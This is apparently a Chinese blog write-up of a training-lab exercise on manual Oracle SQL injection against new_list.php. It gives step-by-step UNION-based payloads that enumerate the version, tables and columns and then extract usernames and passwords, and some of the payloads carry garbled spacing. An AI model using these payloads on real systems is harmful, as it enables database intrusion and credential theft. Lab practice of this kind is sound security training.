Oracle手工注入(墨者学院)

步骤一:判断注入点

new_list . php ? id = 1 and 1 = 1
new_list . php ? id = 1 and 1 = 2

步骤⼆:通过order by来判断字段数。因为order by 2⻚⾯正常,order by 3⻚⾯不正常,故判断当前字段数为2

new_list . php ? id = 1 order by 2
new_list . php ? id = 1 order by 3

步骤三:获取回显点

new_list.php?id=-1 union select '1','null' from dual

步骤四:查询数据库版本信息

new_list.php?id=-1union select 'null',(select banner from sys.v_$version where rownum=1) from dual

步骤五:查询当前数据库库名

new_list . php ? id =- 1 union select 'null' ,( select instance_name from V $INSTANC
E) from dual

步骤六:查询数据库表名,查询表名⼀般查询admin或者user表

#获取第⼀个表名LOGMNR_SESSION_EVOLVE$
new_list.php?id=-1 union select 'null',(select table_name from user_tables where rownum=1 ) from dual
#获取第⼆个表名LOGMNR_GLOBAL$
new_list.php?id=-1 union select 'null',(select table_name from user_tables where rownum=1 and table_name not in 'LOGMNR_SESSION_EVOLVE$') from dual
#获取第三个表名LOGMNR_GT_TAB_INCLUDE$
new_list.php?id=-1 union select 'null',(select table_name from user_tables where rownum=1 and table_name not in 'LOGMNR_SESSION_EVOLVE$' and table_nam e not in 'LOGMNR_GLOBAL$') from dual
#模糊搜索查询.获取sns_users表名
new_list.php?id=-1 union select 'null',(select table_name from user_tables where table_name like '%user%' and rownum=1) from dual

步骤七:查询数据库列名

直接查询
new_list.php?id=-1 union select 'null',(select column_name from user_tab_columns where table_name='sns_users' and rownum=1) from dual
new_list.php?id=-1 union select 'null',(select column_name from user_tab_co lumns where rownum=1 and column_name not in 'USER_NAME') from dual
new_list.php?id=-1 union select 'null',(select column_name from user_tab_columns where rownum=1 and column_name not in 'USER_NAME' and column_name not in 'AGENT_NAME') from dual
new_list.php?id=-1 union select 'null',(select column_name from user_tab_columns where rownum=1 and column_name not in 'USER_NAME' and column_name not in 'AGENT_NAME' and column_name not in 'PROTOCOL' and column_name not in 'SPARE1' and column_name not in 'DB_USERNAME' and column_name not in 'OID' and column_name <> 'EVENTID' and column_name <> 'NAME' and column_name <> 'TABLE_OBJNO') from dual
模糊搜索查询
new_list.php?id=-1 union select 'null',(select column_name from user_tab_columns where table_name='sns_users' and rownum=1 and column_name like '%USE R%') from dual
new_list.php?id=-1 union select 'null',(select column_name from user_tab_columns where table_name='sns_users' and rownum=1 and column_name like '%USE R%' and column_name <> 'USER_NAME') from dual

步骤⼋:查询数据库数据获取账号密码的字段内容

new_list . php ? id =- 1 union select USER_NAME , USER_PWD from "sns_users" where rownum= 1
new_list . php ? id =- 1 union select USER_NAME , USER_PWD from "sns_users" where rownum= 1 and USER_NAME <> 'zhong'
new_list . php ? id =- 1 union select USER_NAME , USER_PWD from "sns_users" where rownum= 1 and USER_NAME <> 'zhong' and USER_NAME not in 'hu'

步骤九:对其数据库内的字段内容进⾏解密....进⾏后台登录

mozhe :439718
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值